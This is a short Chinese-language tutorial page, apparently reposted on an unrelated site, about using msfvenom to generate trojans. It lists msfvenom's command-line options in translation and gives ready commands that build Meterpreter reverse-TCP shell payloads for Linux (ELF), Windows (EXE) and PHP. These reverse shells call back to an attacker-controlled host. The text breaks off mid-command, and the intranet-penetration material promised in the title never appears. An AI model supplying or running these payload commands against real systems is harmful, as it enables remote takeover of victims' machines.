msfvenom生成木马和内网穿透

您所在的位置:网站首页 msfvenom -p msfvenom生成木马和内网穿透

msfvenom生成木马和内网穿透

#msfvenom生成木马和内网穿透| 来源: 网络整理| 查看: 265

msfvenom命令行选项如下:

英文原版

中文版:

Options:

-p, --payload  指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用'-'或者stdin指定 

-l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all 

-n, --nopsled  为payload预先指定一个NOP滑动长度 

-f, --format  指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表) 

-e, --encoder [encoder] 指定需要使用的encoder(编码器) 

-a, --arch  指定payload的目标架构,这里x86是32位,x64是64位 -platform  指定payload的目标平台 

-s, --space  设定有效攻击荷载的最大长度 

-b, --bad-chars  设定规避字符集,比如: '\x00\xff' 

-i, --iterations  指定payload的编码次数 

-c, --add-code  指定一个附加的win32 shellcode文件 

-x, --template  指定一个自定义的可执行文件作为模板 

-k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行 --payload-options 列举payload的标准选项 

-o, --out  保存payload 

-v, --var-name  指定一个自定义的变量,以确定输出格式 

--shellest 最小化生成payload 

-h, --help 查看帮助选项 --help-formats 查看msf支持的输出格式列表

这里举出一些利用msfvenom生成shell的命令:

Linux:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf

Windows:

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe

PHP:

msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php

cat shell.php | pbcopy && echo '



【本文地址】


今日新闻


推荐新闻


CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3